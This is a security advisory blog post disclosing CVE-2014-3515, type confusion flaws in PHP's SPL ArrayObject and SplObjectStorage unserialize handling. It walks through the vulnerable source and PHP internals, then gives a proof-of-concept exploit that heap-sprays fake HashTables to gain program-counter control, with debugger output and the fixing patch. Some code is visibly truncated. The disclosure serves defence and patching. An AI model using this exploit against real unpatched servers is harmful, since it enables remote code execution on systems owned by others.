SPL ArrayObject/SPLObjectStorage Unserialization Type Confusion Vulnerabilities

Posted: by Stefan Esser   |   Auf Deutsch lesen   |  More posts about Blog PHP Vulnerabilities



One month ago the PHP developers released security updates to PHP 5.4 and PHP 5.5 that fixed a number of vulnerabilities. A few of these vulnerabilities were discovered by us and we already disclosed the lesser serious one in our previous blogpost titled phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys. We showed that this vulnerability allowed retrieving the SSL private key from Apache memory. However we kept silent about two more serious type confusion vulnerabilities that were reachable through PHP's unserialize() function until the PHP team had the chance to not only fix PHP 5.4 and PHP 5.5 but also release a final PHP 5.3 release, which fixes these vulnerabilities. Unlike the information leak disclosed before these type confusions can lead to arbitrary remote code execution.

The PHP function unserialize() allows do deserialize PHP variables that were previously serialized into a string represantation by means of the serialize() function. Because of this it has traditionally been used by PHP application developers to transfer data between PHP applications on different servers or as compressed format to store some data client side, despite all warnings that this is potentially dangerous. The dangers arising from this function are twofold. On the one hand it allows to instantiate classes that PHP knows about at the time of execution, which can be abused sometimes to execute arbitrary code as demonstrated in our research Utilizing Code Reuse Or Return Oriented Programming In PHP Application Exploits presented at BlackHat USA 2010. On the other hand there is the danger of memory corruptions, type confusions or use after free vulnerabilities in the unserialize() function itself. The researchers of SektionEins have shown the existence of both types of problems again and again in the past.

During source code audits we perform for our customers we still see unserialize() being used on user input today, despite all the previous vulnerabilities in unserialize() and various examples of successful compromises through object injections. Research from other teams has even shown that often encryption and signing shemes people think up to protect serialized data, do not work and can be exploited.

In this post we will detail two type confusion vulnerabilities in the deserialization of SPL ArrayObject and SPL ObjectStorage objects that we disclosed to PHP.net and show how they allow attackers to execute arbitrary code on the server. Both vulnerabilities have the CVE name CVE-2014-3515 assigned.

The Vulnerabilities

The vulnerabilities in question are located in the PHP source code inside the file /ext/spl/splarray.c inside the SPL_METHOD(Array, unserialize) and inside the file /ext/spl/spl_observer.c inside the SPL_METHOD(SplObjectStorage, unserialize). The vulnerabilities are located in the handling of serialized object member variables.

if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
  goto outexcept;

/* copy members */
if (!intern->std.properties) {
zend_hash_copy(intern->std.properties, Z_ARRVAL_P(pmembers), (copy_ctor_func_t) zval_add_ref, (void *) NULL, sizeof(zval *));

The code above calls the deserializer to get the member variables from the serialized string and then copies them into the properties with the zend_hash_copy() function. The type confusion vulnerability here is that the code assumes that the deserialization returns a PHP array. This is however not checked and fully depends on the content of the serialized string. The result is then used via the Z_ARRVAL_P macro which leads to various problems depending on what type of variable is actually returned by the deserializer.

To understand the problem in more detail let us look at the definition of a ZVAL (ignoring the GC version) and the Z_ARRVAL_P macro:

typedef union _zvalue_value {
   long lval;                                 /* long value */
   double dval;                               /* double value */
   struct {
      char *val;
      int len;
   } str;
   HashTable *ht;                             /* hash table value */
   zend_object_value obj;
} zvalue_value;

struct _zval_struct {
   /* Variable information */
   zvalue_value value;                /* value */
   zend_uint refcount__gc;
   zend_uchar type;   /* active type */
   zend_uchar is_ref__gc;

#define Z_ARRVAL(zval)        (zval).value.ht
#define Z_ARRVAL_P(zval_p)    Z_ARRVAL(*zval_p)

As you can see from these definitions accessing the Z_ARRVAL of a PHP variable will lookup the pointer to HashTable structure from the union zvalue_value. The HashTable structure is PHP's internal way to store array data. Because this is a union for other variable types this pointer will be filled with different types of data. A PHP integer variable for example will have its value stored in the same position as the pointer of the PHP array variable (in case sizeof(long) == sizeof(void *)). The same is true for the value of floating point variables and the other variable types.

Let's look into what happens when the deserializer returns an integer (or maybe a double value for Win64): The value of the integer will be used as an in memory pointer to a HashTable and its data will be copied over into another array. The following little POC code demonstrates this and will make the deserializer attempt to work on a HashTable starting at memory address 0x55555555. This should result in a crash, because it is usually an invalid memory position.


In case the memory address does point to a real HashTable structure, its content is copied over into the deserialized array object as its member variables. This is useful in case the result of the deserialization is serialized again and returned to the user, which is a common pattern in applications exposing unserialize() to user input. The following PHP code is an example of this pattern.

   $data = unserialize(base64_decode($_COOKIE['data']));
   setcookie("data", base64_encode(serialize($data)));

Whenever unserialize() is used in a similar way as above, vulnerabilities exposed through unserialize() can result in information leaks.

Digging Deeper

While integer variables allow us to interpret arbitrary memory positions as HashTable PHP's string variable type might be more interesting for an attacker. When you look at the ZVAL structure above you will realize that the array's HashTable pointer is in the same position as a string's stringdata pointer. This means if the deserializer returns a string instead of an array the content of the string will be accessed as if it is a HashTable. Let's have a look into what these HashTables structures are.

typedef struct _hashtable {
  uint nTableSize;          /* current size of bucket space (power of 2) */
  uint nTableMask;          /* nTableSize - 1 for faster calculation */
  uint nNumOfElements;      /* current number of elements */
  ulong nNextFreeElement;   /* next free numerical index */
  Bucket *pInternalPointer; /* used for element traversal */
  Bucket *pListHead;        /* head of double linked list of all elements in array */
  Bucket *pListTail;        /* tail of double linked list of all elements in array */
  Bucket **arBuckets;       /* hashtable bucket space */
  dtor_func_t pDestructor;  /* element destructor */
  zend_bool persistent;     /* marks hashtable lifetime as persistent */
  unsigned char nApplyCount;  /* required to stop endless recursions */
  zend_bool bApplyProtection; /* required to stop endless recursions */
} HashTable;

PHP's HashTable structure is a mixture of the data structures hashtable and double linked list. This allows for fast element access but also allows to traverse the elements of an array in order. The elements of the array are stored in so called Buckets that either inline the data or provide a pointer to the actual data associated with a bucket. For every possible hash value the topmost bucket is addressed through a pointer from the bucket space. The bucket data structure is as follows:

typedef struct bucket {
  ulong h;          /* Used for numeric indexing */
  uint nKeyLength;  /* 0 for numeric indicies, otherwise length of string */
  void *pData;      /* address of the data */
  void *pDataPtr;   /* storage place for data if datasize == sizeof(void *) */
  struct bucket *pListNext;  /* next pointer in global linked list */
  struct bucket *pListLast;  /* prev pointer in global linked list */
  struct bucket *pNext;      /* next pointer in bucket linked list */
  struct bucket *pLast;      /* prev pointer in bucket linked list */
  char arKey[1]; /* Must be last element - recently changed to point to external array key */
} Bucket;

With those two data structures it is now possible to layout a fake HashTable in the string that is passed to unserialize that itself points to a fake array in memory. Depending on the content of that fake array the destruction of the just deserialized object at the end of the script will trigger the attacker(fake array) supplied HashTable destructor, which gives the attacker control over the program counter. The first parameter to this destructor is a pointer to the pointer to the fake ZVAL supplied by the fake Bucket, which means a pivot gadget that moves the first function paramter into the stack pointer would be enough to start a ROP chain.

Proof of Concept Exploit

The following code was shared with the PHP developers on 20th June 2014. It is a POC that demonstrates program counter control from a PHP script. The POC was developed against a standard MacOSX 10.9.3 installation of PHP 5.4.24. It works by first spraying the heap with a repeated pattern of fake hashtables, buckets and zvals and then triggers the malicious unserialize(). Keep in mind that a remote attacker could heap spray PHP installations by sending lots of POST data to the server and then pass a malicious string to a user input exposed unserialize().

/* Unserialize ArrayObject Type Confusion Exploit */
/* (C) Copyright 2014 Stefan Esser */

ini_set("memory_limit", -1);

if ($_SERVER['argc'] < 2) {
  $__PC__ = 0x504850111110;
} else {
  $__PC__ = $_SERVER['argv'][1] + 0;

// we assume that 0x111000000 is controlled by our heap spray
$base = 0x114000000 + 0x20;

echo "Setting up memory...\n";

echo "Now performing exploit...\n";
$inner = 'x:i:0;a:0:{};m:s:'.strlen($hashtable).':"'.$hashtable.'";';
$exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}';
$z = unserialize($exploit);

function setup_memory()
  global $str, $hashtable, $base, $__PC__;


  $bucket_addr = $base;
  $zval_delta = 0x100;
  $hashtable_delta = 0x200;
  $zval_addr = $base + $zval_delta;
  $hashtable_addr = $base + $hashtable_delta;

  //typedef struct bucket {
  $bucket  = "\x01\x00\x00\x00\x00\x00\x00\x00"; //   ulong h;
  $bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00"; //   uint nKeyLength = 0 => numerical index
  $bucket .= ptr2str($bucket_addr + 3*8);//   void *pData;
  $bucket .= ptr2str($zval_addr); //  void *pDataPtr;
  $bucket .= ptr2str(0);//    struct bucket *pListNext;
  $bucket .= ptr2str(0);//    struct bucket *pListLast;
  $bucket .= ptr2str(0);//    struct bucket *pNext;
  $bucket .= ptr2str(0);//    struct bucket *pLast;
  $bucket .= ptr2str(0);//    const char *arKey;
  //} Bucket;

  //typedef struct _hashtable {
  $hashtable  = "\x00\x00\x00\x00";// uint nTableSize;
  $hashtable .= "\x00\x00\x00\x00";// uint nTableMask;
  $hashtable .= "\x01\x00\x00\x00";// uint nNumOfElements;
  $hashtable .= "\x00\x00\x00\x00";
  $hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";// ulong nNextFreeElement;
  $hashtable .= ptr2str(0);// Bucket *pInternalPointer;       /* Used for element traversal */
  $hashtable .= ptr2str($bucket_addr);//      Bucket *pListHead;
  $hashtable .= ptr2str(0);// Bucket *pListTail;
  $hashtable .= ptr2str(0);// Bucket **arBuckets;
  $hashtable .= ptr2str($__PC__);//   dtor_func_t pDestructor;
  $hashtable .= "\x00";//     zend_bool persistent;
  $hashtable .= "\x00";//     unsigned char nApplyCount;
  //  zend_bool bApplyProtection;
  //} HashTable;

  //typedef union _zvalue_value {
  //  long lval;                                      /* long value */
  //  double dval;                            /* double value */
  //  struct {
  //          char *val;
  //          int len;
  //  } str;
  //  HashTable *ht;                          /* hash table value */
  //  zend_object_value obj;
  //} zvalue_value;

  //struct _zval_struct {
  /* Variable information */
  $zval = ptr2str($hashtable_addr);// zvalue_value value;             /* value */
  $zval .= ptr2str(0);
  $zval .= "\x00\x00\x00\x00";//      zend_uint refcount__gc;
  $zval .= "\x04";//  zend_uchar type;        /* active type */
  $zval .= "\x00";//  zend_uchar is_ref__gc;
  $zval .= ptr2str(0);
  $zval .= ptr2str(0);
  $zval .= ptr2str(0);


  /* Build the string */
  $part = str_repeat("\x73", 4096);
  for ($j=0; $j<strlen($bucket); $j++) {
    $part[$j] = $bucket[$j];
  for ($j=0; $j<strlen($hashtable); $j++) {
    $part[$j+$hashtable_delta] = $hashtable[$j];
  for ($j=0; $j<strlen($zval); $j++) {
    $part[$j+$zval_delta] = $zval[$j];
  $str = str_repeat($part, 1024*1024*256/4096);

function ptr2str($ptr)
  $out = "";
  for ($i=0; $i<8; $i++) {
    $out .= chr($ptr & 0xff);
    $ptr >>= 8;
  return $out;


You can then test the POC on the command line:

$ lldb php
Current executable set to 'php' (x86_64).

(lldb) run exploit.php 0x1122334455
There is a running process, kill it and restart?: [Y/n] y
Process 38336 exited with status = 9 (0x00000009)
Process 38348 launched: '/usr/bin/php' (x86_64)
Setting up memory...
Now performing exploit...
Process 38348 stopped
* thread #1: tid = 0x636867, 0x0000001122334455, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1122334455)
    frame #0: 0x0000001122334455
error: memory read failed for 0x1122334400
(lldb) re re
General Purpose Registers:
     rax = 0x0000001122334455
     rbx = 0x0000000114000020
     rcx = 0x000000010030fd48  php`_zval_dtor_func + 160
     rdx = 0x0000000100d22050
     rdi = 0x0000000114000038
     rsi = 0x0000000000000000
     rbp = 0x00007fff5fbfe8b0
     rsp = 0x00007fff5fbfe888
      r8 = 0x0000000000000000
      r9 = 0x0000000000000008
     r10 = 0x0000000000000000
     r11 = 0x000000000000005b
     r12 = 0x0000000100956be8  php`executor_globals
     r13 = 0x0000000000000000
     r14 = 0x0000000114000220
     r15 = 0x0000000000000000
     rip = 0x0000001122334455  <----- controlled RIP
  rflags = 0x0000000000010206
      cs = 0x000000000000002b
      fs = 0x0000000000000000
      gs = 0x0000000022330000

(lldb) x/20x $rdi-0x18
0x114000020: 0x00000001 0x00000000 0x00000000 0x00000000
0x114000030: 0x14000038 0x00000001 0x14000120 0x00000001 <---- &pDataPtr
0x114000040: 0x00000000 0x00000000 0x00000000 0x00000000
0x114000050: 0x00000000 0x00000000 0x00000000 0x00000000
0x114000060: 0x00000000 0x00000000 0x73737373 0x73737373

The Fix

We shared our patches for these vulnerabilities with the PHP developers who have therefore released PHP 5.5.14, PHP 5.4.30 and PHP 5.3.29. If you are running any of these versions you do not need to apply the fix. If you are not you should make sure that you apply the following patchset.

--- php-5.5.13/ext/spl/spl_observer.c 2014-05-28 11:06:28.000000000 +0200
+++ php-5.5.13-unserialize-fixed/ext/spl/spl_observer.c       2014-06-20 17:54:33.000000000 +0200
@@ -898,7 +898,7 @@

-     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) {
              goto outexcept;
--- php-5.5.13/ext/spl/spl_array.c    2014-05-28 11:06:28.000000000 +0200
+++ php-5.5.13-unserialize-fixed/ext/spl/spl_array.c  2014-06-20 17:54:09.000000000 +0200
@@ -1789,7 +1789,7 @@

-     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) {
              goto outexcept;

Stefan Esser